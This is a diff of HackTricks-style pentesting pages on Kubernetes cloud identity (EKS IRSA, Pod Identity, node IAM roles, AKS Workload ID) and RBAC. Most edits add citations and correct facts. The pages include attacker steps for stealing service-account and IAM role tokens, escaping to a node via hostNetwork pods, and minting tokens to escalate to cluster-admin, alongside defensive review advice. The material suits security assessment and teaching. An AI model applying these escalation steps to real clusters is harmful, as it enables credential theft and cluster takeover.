+3. Create a [trust relationship between the IAM role and the SA](https://docs.aws.amazon.com/eks/latest/userguide/associate-service-account-role.html) name (or the namespaces giving access to the role to all the SAs of the namespace). _The trust relationship will mainly check the OIDC provider name, the namespace name and the SA name_. <sup>[[19]](#references)</sup>
+4. Finally, **create a SA with an annotation indicating the ARN of the role**, and the pods running with that SA will have **access to the token of the role**. The **token** is **written** inside a file and the path is specified in **`AWS_WEB_IDENTITY_TOKEN_FILE`** (default: `/var/run/secrets/eks.amazonaws.com/serviceaccount/token`) <sup>[[3]](#references)[[19]](#references)</sup>
 
 ```bash
 # Create a service account with a role
@@ -255,10 +255,10 @@ aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/
 > [!WARNING]
 > As an attacker, if you can enumerate a K8s cluster, check for **service accounts with that annotation** to **escalate to AWS**. To do so, just **exec/create** a **pod** using one of the IAM **privileged service accounts** and steal the token.
 >
-> Moreover, if you are inside a pod, check for env variables like **AWS_ROLE_ARN** and **AWS_WEB_IDENTITY_TOKEN.**
+> Moreover, if you are inside a pod, check for env variables like **AWS_ROLE_ARN** and **AWS_WEB_IDENTITY_TOKEN.** <sup>[[3]](#references)[[19]](#references)</sup>
 
 > [!CAUTION]
-> Sometimes the **Turst Policy of a role** might be **bad configured** and instead of giving AssumeRole access to the expected service account, it gives it to **all the service accounts**. Therefore, if you are capable of write an annotation on a controlled service account, you can access the role.
+> Sometimes the **Turst Policy of a role** might be **bad configured** and instead of giving AssumeRole access to the expected service account, it gives it to **all the service accounts**. Therefore, if you are capable of write an annotation on a controlled service account, you can access the role. <sup>[[19]](#references)</sup>
 >
 > Check the **following page for more information**:
 
@@ -268,9 +268,9 @@ aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/
 
 ### EKS Pod Identity
 
-EKS Pod Identity is the newer AWS-managed way to associate an IAM role with a Kubernetes service account without relying on each workload to call STS with an IRSA web identity token. The cluster runs the EKS Pod Identity Agent on nodes, the EKS API stores pod identity associations, and AWS SDKs in selected pods obtain credentials through the container credentials provider path exposed by the agent.
+EKS Pod Identity is the newer AWS-managed way to associate an IAM role with a Kubernetes service account without relying on each workload to call STS with an IRSA web identity token. The cluster runs the EKS Pod Identity Agent on nodes, the EKS API stores pod identity associations, and AWS SDKs in selected pods obtain credentials through the container credentials provider path exposed by the agent. <sup>[[4]](#references)[[5]](#references)</sup>
 
-From Kubernetes, the interesting evidence is still the service account and pod relationship, but the runtime signals are different from IRSA. Look for AWS container credential environment variables in pods rather than only `AWS_WEB_IDENTITY_TOKEN_FILE`:
+From Kubernetes, the interesting evidence is still the service account and pod relationship, but the runtime signals are different from IRSA. Look for AWS container credential environment variables in pods rather than only `AWS_WEB_IDENTITY_TOKEN_FILE`: <sup>[[4]](#references)[[5]](#references)</sup>
 
 ```bash
 kubectl get pods -A -o yaml | grep -nE 'AWS_CONTAINER_CREDENTIALS|AWS_CONTAINER_AUTHORIZATION_TOKEN_FILE|AWS_ROLE_ARN|AWS_WEB_IDENTITY_TOKEN_FILE'
@@ -287,7 +287,7 @@ aws eks describe-pod-identity-association \
     --association-id <association-id>
 ```
 
-Inside an associated pod, the main runtime indicators are the container credentials provider variables injected by EKS:
+Inside an associated pod, the main runtime indicators are the container credentials provider variables injected by EKS: <sup>[[5]](#references)</sup>
 
 ```bash
 env | grep -E '^AWS_CONTAINER_(CREDENTIALS_FULL_URI|AUTHORIZATION_TOKEN_FILE)='
@@ -295,25 +295,25 @@ ls -l /var/run/secrets/pods.eks.amazonaws.com/serviceaccount/ 2>/dev/null
 aws sts get-caller-identity
 ```
 
-The local credential endpoint is usually `http://169.254.170.23/v1/credentials` and the authorization token is a projected service account token for the `pods.eks.amazonaws.com` audience. Remember that AWS SDK credential-provider order still applies: if static environment credentials or shared credential files are configured earlier in the chain, the pod may use those instead of the Pod Identity association.
+The local credential endpoint is usually `http://169.254.170.23/v1/credentials` and the authorization token is a projected service account token for the `pods.eks.amazonaws.com` audience. Remember that AWS SDK credential-provider order still applies: if static environment credentials or shared credential files are configured earlier in the chain, the pod may use those instead of the Pod Identity association. <sup>[[5]](#references)[[27]](#references)[[33]](#references)</sup>
 
-Pod Identity roles normally trust the `pods.eks.amazonaws.com` service principal for `sts:AssumeRole` and `sts:TagSession`. Review trust-policy conditions on request tags such as `kubernetes-namespace`, `kubernetes-service-account`, and cluster tags, because broad conditions can make a reusable role available to too many service accounts. Pod Identity also adds session tags to the temporary credentials, and those tags can drive ABAC policies such as resource access based on `${aws:PrincipalTag/kubernetes-namespace}` or `${aws:PrincipalTag/kubernetes-service-account}`.
+Pod Identity roles normally trust the `pods.eks.amazonaws.com` service principal for `sts:AssumeRole` and `sts:TagSession`. Review trust-policy conditions on request tags such as `kubernetes-namespace`, `kubernetes-service-account`, and cluster tags, because broad conditions can make a reusable role available to too many service accounts. Pod Identity also adds session tags to the temporary credentials, and those tags can drive ABAC policies such as resource access based on `${aws:PrincipalTag/kubernetes-namespace}` or `${aws:PrincipalTag/kubernetes-service-account}`. <sup>[[25]](#references)[[26]](#references)[[32]](#references)</sup>
 
-For cross-account access, a Pod Identity association can use a same-account role that chains into a target role in another account. In that case, review both layers: the EKS association role and the target role trust/policy. The Pod Identity session tags are transitive across the role chain, so they are useful evidence for proving which cluster namespace and service account accessed the remote account.
+For cross-account access, a Pod Identity association can use a same-account role that chains into a target role in another account. In that case, review both layers: the EKS association role and the target role trust/policy. The Pod Identity session tags are transitive across the role chain, so they are useful evidence for proving which cluster namespace and service account accessed the remote account. <sup>[[4]](#references)[[25]](#references)[[26]](#references)[[32]](#references)</sup>
 
 > [!WARNING]
-> If you can create or modify pods that use a service account with an EKS Pod Identity association, test whether that pod receives useful AWS permissions. If you are defending, alert on new pod identity associations, unexpected service account use, and AWS API calls from roles that should only be used by specific workloads.
+> If you can create or modify pods that use a service account with an EKS Pod Identity association, test whether that pod receives useful AWS permissions. If you are defending, alert on new pod identity associations, unexpected service account use, and AWS API calls from roles that should only be used by specific workloads. <sup>[[4]](#references)</sup>
 
 ### EKS governance guardrails
 
-When reviewing EKS from the AWS side, remember that IAM and AWS Organizations guardrails can deny unsafe cluster configuration even when a principal has broad-looking EKS permissions. Recent EKS condition keys cover cluster settings such as public or private endpoint access, Kubernetes version, secrets-encryption KMS keys, deletion protection, control-plane scaling tier, and zonal shift configuration. These keys can be used in IAM policies or Service Control Policies to enforce account-wide cluster baselines.
+When reviewing EKS from the AWS side, remember that IAM and AWS Organizations guardrails can deny unsafe cluster configuration even when a principal has broad-looking EKS permissions. Recent EKS condition keys cover cluster settings such as public or private endpoint access, Kubernetes version, secrets-encryption KMS keys, deletion protection, control-plane scaling tier, and zonal shift configuration. These keys can be used in IAM policies or Service Control Policies to enforce account-wide cluster baselines. <sup>[[22]](#references)[[23]](#references)</sup>
 
-This matters for both attack impact and triage. If a principal can call `eks:UpdateClusterConfig` but an SCP denies enabling a public endpoint through `eks:endpointPublicAccess`, report the attempted risky action and the guardrail that blocked it instead of claiming public API exposure. For defenders, alert on denied EKS configuration changes as well as successful changes, because denied attempts can reveal compromised automation, stale admin roles, or reconnaissance before a pivot to a less protected account.
+This matters for both attack impact and triage. If a principal can call `eks:UpdateClusterConfig` but an SCP denies enabling a public endpoint through `eks:endpointPublicAccess`, report the attempted risky action and the guardrail that blocked it instead of claiming public API exposure. For defenders, alert on denied EKS configuration changes as well as successful changes, because denied attempts can reveal compromised automation, stale admin roles, or reconnaissance before a pivot to a less protected account. <sup>[[23]](#references)</sup>
 
 Useful references:
 
-- [Amazon EKS IAM condition keys](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonelastickubernetesservice.html)
-- [AWS Organizations service control policies](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html)
+- [Amazon EKS IAM condition keys](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonelastickubernetesservice.html) <sup>[[22]](#references)</sup>
+- [AWS Organizations service control policies](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html) <sup>[[23]](#references)</sup>
 
 ### Find Pods a SAs with IAM Roles in the Cluster
 
@@ -338,7 +338,7 @@ done | grep -B 1 "amazonaws.com"
 
 ### Node IAM Role to cluster-admin
 
-The previos section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node is highly probable going to **have an IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node_).
+The previos section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node is highly probable going to **have an IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node_). <sup>[[24]](#references)</sup>
 
 To access the node metadata endpoint you need to:
 - Be in a pod and have the metadata endpoint configured to at least 2 tcp hops. This is the most common misconfiguration as usually different pods in the cluster will require access to the metadata endpoint to not break and several companies just decide to allow access to the metadata endpoint from all the pods in the cluster.
@@ -347,7 +347,7 @@ To access the node metadata endpoint you need to:
 
 (Note that the metadata endpoint is at 169.254.169.254 as always).
 
-In newer EKS environments, verify the node and cluster mode before assuming pods can reach the node instance profile. Amazon Linux 2023 EKS optimized AMIs default the IMDS hop limit to 1, and EKS Auto Mode enables `disablePodIMDS` by default, so ordinary pods should not receive node-role credentials unless the operator changed those settings or the pod has another node-level path such as `hostNetwork` or node compromise. The recommended pattern is to block pod access to node IMDS and use IRSA or EKS Pod Identity for workload AWS permissions.
+In newer EKS environments, verify the node and cluster mode before assuming pods can reach the node instance profile. Amazon Linux 2023 managed node groups commonly default IMDSv2's hop count to 1, and EKS Auto Mode enforces IMDSv2 with a hop limit of 1; `disablePodIMDS` is a separate node-group setting that blocks IMDS requests from non-host-network pods. Ordinary pods should not receive node-role credentials unless the operator changed those settings or the pod has another node-level path such as `hostNetwork` or node compromise. The recommended pattern is to block pod access to node IMDS and use IRSA or EKS Pod Identity for workload AWS permissions. <sup>[[24]](#references)[[28]](#references)[[29]](#references)[[30]](#references)</sup>
 
 To **escape to the node** you can use the following command to run a pod with `hostNetwork` enabled:
 
@@ -374,11 +374,11 @@ fi
 
 ### Privesc to cluster-admin
 
-In summary: if it's possible to **access the EKS Node IAM role** from a pod, it's possible to **compromise the full kubernetes cluster**.
+In summary: if it's possible to **access the EKS Node IAM role** from a pod, it's possible to **compromise the full kubernetes cluster**. <sup>[[20]](#references)</sup>
 
-For more info check [this post](https://blog.calif.io/p/privilege-escalation-in-eks). As summary, the default IAM EKS role that is assigned to the EKS nodes by default is assigned the role `system:node` inside the cluster. This role is very interesting although is limited by the kubernetes [**Node Restrictions**](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction).
+For more info check [this post](https://blog.calif.io/p/privilege-escalation-in-eks). As summary, the default IAM EKS role that is assigned to the EKS nodes by default is assigned the role `system:node` inside the cluster. This role is very interesting although is limited by the kubernetes [**Node Restrictions**](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction). <sup>[[20]](#references)[[21]](#references)</sup>
 
-However, the node can always **generate tokens for service accounts** running in pods inside the node. So, if the node is running a pod with a privileged service account, the node can generate a token for that service account and use it to impersonate the service account like in:
+However, the node can always **generate tokens for service accounts** running in pods inside the node. So, if the node is running a pod with a privileged service account, the node can generate a token for that service account and use it to impersonate the service account like in: <sup>[[20]](#references)[[14]](#references)</sup>
 
 ```bash
 kubectl --context=node1 create token -n ns1 sa-priv \
@@ -391,11 +391,11 @@ kubectl --context=node1 create token -n ns1 sa-priv \
 
 In AKS, keep three identity paths separated during assessment:
 
-- **Azure to Kubernetes**: Azure principals can retrieve user or admin kubeconfigs through Azure Resource Manager if their Azure RBAC role allows it. Local admin kubeconfigs from `az aks get-credentials --admin` are certificate-based credentials and can bypass normal Microsoft Entra user/group governance unless local accounts are disabled.
-- **Microsoft Entra to Kubernetes**: Entra-integrated clusters authenticate users, groups, or service principals through `kubelogin`/exec kubeconfigs. The final Kubernetes action can be authorized by native Kubernetes RBAC or by Azure RBAC for Kubernetes Authorization.
-- **Kubernetes to Azure**: Pods should normally use Microsoft Entra Workload ID, which exchanges projected Kubernetes service account tokens with Entra through the AKS OIDC issuer and federated identity credentials.
+- **Azure to Kubernetes**: Azure principals can retrieve user or admin kubeconfigs through Azure Resource Manager if their Azure RBAC role allows it. Local admin kubeconfigs from `az aks get-credentials --admin` are certificate-based credentials and can bypass normal Microsoft Entra user/group governance unless local accounts are disabled. <sup>[[6]](#references)</sup>
+- **Microsoft Entra to Kubernetes**: Entra-integrated clusters authenticate users, groups, or service principals through `kubelogin`/exec kubeconfigs. The final Kubernetes action can be authorized by native Kubernetes RBAC or by Azure RBAC for Kubernetes Authorization. <sup>[[6]](#references)[[10]](#references)</sup>
+- **Kubernetes to Azure**: Pods should normally use Microsoft Entra Workload ID, which exchanges projected Kubernetes service account tokens with Entra through the AKS OIDC issuer and federated identity credentials. <sup>[[6]](#references)[[7]](#references)</sup>
 
-Useful AKS identity checks from Azure:
+Useful AKS identity checks from Azure: <sup>[[6]](#references)[[10]](#references)</sup>
 
 ```bash
 az aks show -g <resource-group> -n <cluster> \
@@ -407,14 +407,14 @@ az role assignment list --scope "$AKS_ID" --include-inherited -o table
 az role assignment list --scope "$AKS_ID/namespaces/<namespace>" -o table
 ```
 
-From Kubernetes, search for AKS Workload ID signals:
+From Kubernetes, search for AKS Workload ID signals: <sup>[[7]](#references)</sup>
 
 ```bash
 kubectl get serviceaccounts -A -o yaml | grep -n 'azure.workload.identity' -B 6 -A 8
 kubectl get pods -A -o yaml | grep -n 'azure.workload.identity/use' -B 8 -A 8
 ```
 
-The relevant Workload ID fields are usually:
+The relevant Workload ID fields are usually: <sup>[[7]](#references)</sup>
 
 ```yaml
 metadata:
@@ -427,7 +427,7 @@ metadata:
     azure.workload.identity/use: "true"
 ```
 
-Newer AKS environments may use **AKS Identity Bindings** (preview) to scale Workload ID across many clusters or service accounts without creating one federated identity credential per subject. In that model, a user-assigned managed identity is bound to the AKS cluster, workloads opt in with `azure.workload.identity/use-identity-binding: "true"`, and Kubernetes RBAC grants `use-managed-identity` on `cid.wi.aks.azure.com` resources named after managed identity client IDs. A broad `ClusterRoleBinding` here can expose the same Azure identity to more namespaces than expected, even if direct federated identity credential subjects look narrow.
+Newer AKS environments may use **AKS Identity Bindings** (preview) to scale Workload ID across many clusters or service accounts without creating one federated identity credential per subject. In that model, a user-assigned managed identity is bound to the AKS cluster, workloads opt in with `azure.workload.identity/use-identity-binding: "true"`, and Kubernetes RBAC grants `use-managed-identity` on `cid.wi.aks.azure.com` resources named after managed identity client IDs. A broad `ClusterRoleBinding` here can expose the same Azure identity to more namespaces than expected, even if direct federated identity credential subjects look narrow. <sup>[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 az aks identity-binding list -g <resource-group> --cluster-name <cluster> -o yaml
@@ -435,7 +435,7 @@ kubectl get clusterrole,clusterrolebinding -o yaml | grep -n 'cid.wi.aks.azure.c
 kubectl get pods -A -o yaml | grep -n 'azure.workload.identity/use-identity-binding' -B 8 -A 12
 ```
 
-If the cluster still uses the deprecated Microsoft Entra pod-managed identity model, look for the old CRDs and NMI/MIC components instead of the Workload ID annotations:
+If the cluster still uses the deprecated Microsoft Entra pod-managed identity model, look for the old CRDs and NMI/MIC components instead of the Workload ID annotations: <sup>[[7]](#references)</sup>
 
 ```bash
 kubectl get crd | grep -i azureidentity
@@ -443,9 +443,9 @@ kubectl get azureidentity,azureidentitybinding,azureassignedidentity -A -o yaml 
 kubectl get ds -A | grep -Ei 'nmi|mic|aad-pod-identity'
 ```
 
-AKS nodes are Azure VM scale set instances, so node or host-level access can expose Azure Instance Metadata Service at `169.254.169.254`. Do not assume an ordinary pod should receive node managed identity credentials: verify workload identity settings, legacy pod identity/NMI behavior, hostNetwork usage, network controls, and node access first. If a node identity has broad Azure permissions, node compromise can become an Azure pivot even when application Workload ID is correctly scoped.
+AKS nodes are Azure VM scale set instances, so node or host-level access can expose Azure Instance Metadata Service at `169.254.169.254`. Do not assume an ordinary pod should receive node managed identity credentials: verify workload identity settings, legacy pod identity/NMI behavior, hostNetwork usage, network controls, and node access first. If a node identity has broad Azure permissions, node compromise can become an Azure pivot even when application Workload ID is correctly scoped. <sup>[[6]](#references)[[31]](#references)</sup>
 
-AKS Automatic and Node Auto-Provisioning (NAP) change the node-side evidence you should collect. AKS Automatic preconfigures several production defaults, including Workload ID/OIDC support, managed node pools, node resource group lockdown, and managed upgrade behavior. NAP is the managed Karpenter-based provisioning mode and uses Kubernetes resources such as `NodePool`, `AKSNodeClass`, and `NodeClaim` to decide which nodes are created for pending workloads. Review who can modify those resources, high-impact scheduling controls, privileged pods, and broad tolerations; also check whether node resource group lockdown blocked direct VMSS/load balancer edits and forced changes back through Kubernetes or AKS APIs.
+AKS Automatic and Node Auto-Provisioning (NAP) change the node-side evidence you should collect. AKS Automatic preconfigures several production defaults, including Workload ID/OIDC support, managed node pools, node resource group lockdown, and managed upgrade behavior. NAP is the managed Karpenter-based provisioning mode and uses Kubernetes resources such as `NodePool`, `AKSNodeClass`, and `NodeClaim` to decide which nodes are created for pending workloads. Review who can modify those resources, high-impact scheduling controls, privileged pods, and broad tolerations; also check whether node resource group lockdown blocked direct VMSS/load balancer edits and forced changes back through Kubernetes or AKS APIs. <sup>[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
 ```bash
 az aks show -g <resource-group> -n <cluster> \
@@ -458,18 +458,38 @@ kubectl get nodepools,aksnodeclasses,nodeclaims -A -o yaml 2>/dev/null
 
 ## References
 
-- [https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity)
-- [https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)
-- [https://blogs.halodoc.io/iam-roles-for-service-accounts-2/](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/)
-- [https://docs.aws.amazon.com/eks/latest/userguide/pod-identities.html](https://docs.aws.amazon.com/eks/latest/userguide/pod-identities.html)
-- [https://docs.aws.amazon.com/eks/latest/userguide/pod-id-how-it-works.html](https://docs.aws.amazon.com/eks/latest/userguide/pod-id-how-it-works.html)
-- [https://learn.microsoft.com/en-us/azure/aks/concepts-identity](https://learn.microsoft.com/en-us/azure/aks/concepts-identity)
-- [https://learn.microsoft.com/en-us/azure/aks/workload-identity-overview](https://learn.microsoft.com/en-us/azure/aks/workload-identity-overview)
-- [https://learn.microsoft.com/en-us/azure/aks/identity-bindings-concepts](https://learn.microsoft.com/en-us/azure/aks/identity-bindings-concepts)
-- [https://learn.microsoft.com/en-us/azure/aks/identity-bindings](https://learn.microsoft.com/en-us/azure/aks/identity-bindings)
-- [https://learn.microsoft.com/en-us/azure/aks/entra-id-authorization](https://learn.microsoft.com/en-us/azure/aks/entra-id-authorization)
-- [https://learn.microsoft.com/en-us/azure/aks/intro-aks-automatic](https://learn.microsoft.com/en-us/azure/aks/intro-aks-automatic)
-- [https://learn.microsoft.com/en-us/azure/aks/node-auto-provisioning](https://learn.microsoft.com/en-us/azure/aks/node-auto-provisioning)
-- [https://learn.microsoft.com/en-us/azure/aks/node-resource-group-lockdown](https://learn.microsoft.com/en-us/azure/aks/node-resource-group-lockdown)
+- [1] [Authenticate to Google Cloud APIs from GKE workloads](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity)
+- [2] [GKE Workload Identity: A Secure Way for GKE Applications to Access GCP Services](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)
+- [3] [Implementing RBAC for pods - IAM Roles for Service Accounts](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/)
+- [4] [Learn how EKS Pod Identity grants pods access to AWS services](https://docs.aws.amazon.com/eks/latest/userguide/pod-identities.html)
+- [5] [Understand how EKS Pod Identity works](https://docs.aws.amazon.com/eks/latest/userguide/pod-id-how-it-works.html)
+- [6] [Concepts - Access and Identity in Azure Kubernetes Service (AKS)](https://learn.microsoft.com/en-us/azure/aks/concepts-identity)
+- [7] [Use a Microsoft Entra Workload ID on Azure Kubernetes Service (AKS)](https://learn.microsoft.com/en-us/azure/aks/workload-identity-overview)
+- [8] [Identity bindings for Azure Kubernetes Service (AKS) (preview)](https://learn.microsoft.com/en-us/azure/aks/identity-bindings-concepts)
+- [9] [Set up identity bindings on Azure Kubernetes Service (AKS) (preview)](https://learn.microsoft.com/en-us/azure/aks/identity-bindings)
+- [10] [Use Microsoft Entra ID Authorization for the Kubernetes API in AKS](https://learn.microsoft.com/en-us/azure/aks/entra-id-authorization)
+- [11] [Introduction to Azure Kubernetes Service (AKS) Automatic](https://learn.microsoft.com/en-us/azure/aks/intro-aks-automatic)
+- [12] [Overview of Node Auto-Provisioning (NAP) in AKS](https://learn.microsoft.com/en-us/azure/aks/node-auto-provisioning)
+- [13] [Deploy a Fully Managed Resource Group with Node Resource Group Lockdown in AKS](https://learn.microsoft.com/en-us/azure/aks/node-resource-group-lockdown)
+- [14] [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
+- [15] [Service accounts overview](https://cloud.google.com/iam/docs/understanding-service-accounts)
+- [16] [Kiam](https://github.com/uswitch/kiam)
+- [17] [kube2iam](https://github.com/jtblin/kube2iam)
+- [18] [Create an IAM OIDC provider for your cluster](https://docs.aws.amazon.com/eks/latest/userguide/enable-iam-roles-for-service-accounts.html)
+- [19] [Assign IAM roles to Kubernetes service accounts](https://docs.aws.amazon.com/eks/latest/userguide/associate-service-account-role.html)
+- [20] [Privilege escalation in AWS Elastic Kubernetes Service (EKS)](https://blog.calif.io/p/privilege-escalation-in-eks)
+- [21] [NodeRestriction admission controller](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction)
+- [22] [Actions, resources, and condition keys for Amazon Elastic Kubernetes Service](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonelastickubernetesservice.html)
+- [23] [Service control policies (SCPs)](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html)
+- [24] [Identity and Access Management](https://docs.aws.amazon.com/eks/latest/best-practices/identity-and-access-management.html)
+- [25] [Create IAM role with trust policy required by EKS Pod Identity](https://docs.aws.amazon.com/eks/latest/userguide/pod-id-role.html)
+- [26] [Pass session tags in AWS STS](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_session-tags.html)
+- [27] [AWS SDKs and Tools standardized credential providers](https://docs.aws.amazon.com/sdkref/latest/guide/standardized-credentials.html)
+- [28] [Security](https://docs.aws.amazon.com/eks/latest/eksctl/security.html)
+- [29] [Upgrade from Amazon Linux 2 to Amazon Linux 2023](https://docs.aws.amazon.com/eks/latest/userguide/al2023.html)
+- [30] [Learn about EKS Auto Mode Managed instances](https://docs.aws.amazon.com/eks/latest/userguide/automode-learn-instances.html)
+- [31] [Azure Instance Metadata Service for virtual machines](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service)
+- [32] [Grant Pods access to AWS resources based on tags](https://docs.aws.amazon.com/eks/latest/userguide/pod-id-abac.html)
+- [33] [Use pod identity with the AWS SDK](https://docs.aws.amazon.com/eks/latest/userguide/pod-id-minimum-sdk.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md
@@ -4,37 +4,37 @@
 
 ## Role-Based Access Control (RBAC)
 
-Kubernetes has an **authorization module named Role-Based Access Control** ([**RBAC**](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)) that helps to set utilization permissions to the API server.
+Kubernetes has an **authorization module named Role-Based Access Control** ([**RBAC**](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)) that helps to set utilization permissions to the API server.<sup>[[1]](#references)</sup>
 
 RBAC’s permission model is built from **three individual parts**:
 
-1. **Role\ClusterRole ­–** The actual permission. It contains _**rules**_ that represent a set of permissions. Each rule contains [resources](https://kubernetes.io/docs/reference/kubectl/overview/#resource-types) and [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb). The verb is the action that will apply on the resource.
-2. **Subject (User, Group or ServiceAccount) –** The object that will receive the permissions.
-3. **RoleBinding\ClusterRoleBinding –** The connection between Role\ClusterRole and the subject.
+1. **Role\ClusterRole ­–** The actual permission. It contains _**rules**_ that represent a set of permissions. Each rule contains [resources](https://kubernetes.io/docs/reference/kubectl/overview/#resource-types) and [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb). The verb is the action that will apply on the resource.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+2. **Subject (User, Group or ServiceAccount) –** The object that will receive the permissions.<sup>[[1]](#references)</sup>
+3. **RoleBinding\ClusterRoleBinding –** The connection between Role\ClusterRole and the subject.<sup>[[1]](#references)</sup>
 
 ![Kubernetes RBAC diagram showing RoleBinding connecting a ServiceAccount subject to Role permissions](https://www.cyberark.com/wp-content/uploads/2018/12/rolebiding_serviceaccount_and_role-1024x551.png)
 
-The difference between “**Roles**” and “**ClusterRoles**” is just where the role will be applied – a “**Role**” will grant access to only **one** **specific** **namespace**, while a “**ClusterRole**” can be used in **all namespaces** in the cluster. Moreover, **ClusterRoles** can also grant access to:
+The difference between “**Roles**” and “**ClusterRoles**” is where the role is defined and applied: a “**Role**” grants access within one **specific** **namespace**, while a “**ClusterRole**” can be granted in **all namespaces** in the cluster.<sup>[[1]](#references)</sup> Moreover, **ClusterRoles** can also grant access to:<sup>[[1]](#references)</sup>
 
 - **cluster-scoped** resources (like nodes).
 - **non-resource** endpoints (like /healthz).
 - namespaced resources (like Pods), **across all namespaces**.
 
-From **Kubernetes** 1.6 onwards, **RBAC** policies are **enabled by default**. But to enable RBAC you can use something like:
+RBAC became beta in **Kubernetes 1.6** and generally available in **1.8**; many clusters and provisioning strategies enabled it by default from the 1.6 beta onward, but verify the API server's actual authorizer configuration.<sup>[[4]](#references)</sup> To enable RBAC, you can use something like:
 
 ```
 kube-apiserver --authorization-mode=Example,RBAC --other-options --more-options
 ```
 
-Modern clusters can also configure the API server authorizer chain with `--authorization-config`, which points to an `AuthorizationConfiguration` file. This file can define ordered authorizers, multiple webhook authorizers, webhook timeouts, `failurePolicy`, cache settings, and CEL `matchConditions` that decide which requests are sent to a webhook. During a security review, do not stop at `--authorization-mode` if `--authorization-config` is present: read the referenced file and check whether a webhook can fail open with `NoOpinion`, whether match conditions skip sensitive resources, and whether all API server replicas use equivalent authorization configuration.
+Modern clusters can also configure the API server authorizer chain with `--authorization-config`, which points to an `AuthorizationConfiguration` file. This file can define ordered authorizers, multiple webhook authorizers, webhook timeouts, `failurePolicy`, cache settings, and CEL `matchConditions` that decide which requests are sent to a webhook. During a security review, do not stop at `--authorization-mode` if `--authorization-config` is present: read the referenced file and check whether a webhook can fail open with `NoOpinion`, whether match conditions skip sensitive resources, and whether all API server replicas use equivalent authorization configuration.<sup>[[3]](#references)</sup>
 
-Also check authentication configuration when reviewing anonymous API exposure. `--authentication-config` can scope the anonymous authenticator to specific paths such as `/livez`, `/readyz`, and `/healthz`. Anonymous health endpoint access is not the same as anonymous access to Kubernetes resources; the dangerous condition is an RBAC or authorizer path that lets `system:anonymous` or `system:unauthenticated` read or modify real API objects.
+Also check authentication configuration when reviewing anonymous API exposure. `--authentication-config` can scope the anonymous authenticator to specific paths such as `/livez`, `/readyz`, and `/healthz`. Anonymous health endpoint access is not the same as anonymous access to Kubernetes resources; the dangerous condition is an RBAC or authorizer path that lets `system:anonymous` or `system:unauthenticated` read or modify real API objects.<sup>[[5]](#references)</sup>
 
-Finally, treat membership in `system:masters` as cluster-admin-equivalent. Users or certificates in this group have unrestricted API access that bypasses normal RBAC and webhook authorization restrictions, so identity mappings that add this group can be more important than ordinary RoleBinding output.
+Finally, treat membership in `system:masters` as cluster-admin-equivalent. Users or certificates in this group have unrestricted API access that bypasses normal RBAC and webhook authorization restrictions, so identity mappings that add this group can be more important than ordinary RoleBinding output.<sup>[[3]](#references)</sup>
 
 ## Templates
 
-In the template of a **Role** or a **ClusterRole** you will need to indicate the **name of the role**, the **namespace** (in roles) and then the **apiGroups**, **resources** and **verbs** of the role:
+In the template of a **Role** or a **ClusterRole** you will need to indicate the **name of the role**, the **namespace** (in roles) and then the **apiGroups**, **resources** and **verbs** of the role:<sup>[[1]](#references)</sup>
 
 - The **apiGroups** is an array that contains the different **API namespaces** that this rule applies to. For example, a Pod definition uses apiVersion: v1. _It can has values such as rbac.authorization.k8s.io or \[\*]_.
 - The **resources** is an array that defines **which resources this rule applies to**. You can find all the resources with: `kubectl api-resources --namespaced=true`
@@ -42,7 +42,7 @@ In the template of a **Role** or a **ClusterRole** you will need to indicate the
 
 ### Rules Verbs
 
-(_This info was taken from_ [_**the docs**_](https://kubernetes.io/docs/reference/access-authn-authz/authorization/index.html#determine-the-request-verb))
+(_This info was taken from_ [_**the docs**_](https://kubernetes.io/docs/reference/access-authn-authz/authorization/index.html#determine-the-request-verb))<sup>[[3]](#references)</sup>
 
 | HTTP verb | request verb                                                                                                                                                  |
 | --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------- |
@@ -54,14 +54,14 @@ In the template of a **Role** or a **ClusterRole** you will need to indicate the
 
 Kubernetes sometimes checks authorization for additional permissions using specialized verbs. For example:
 
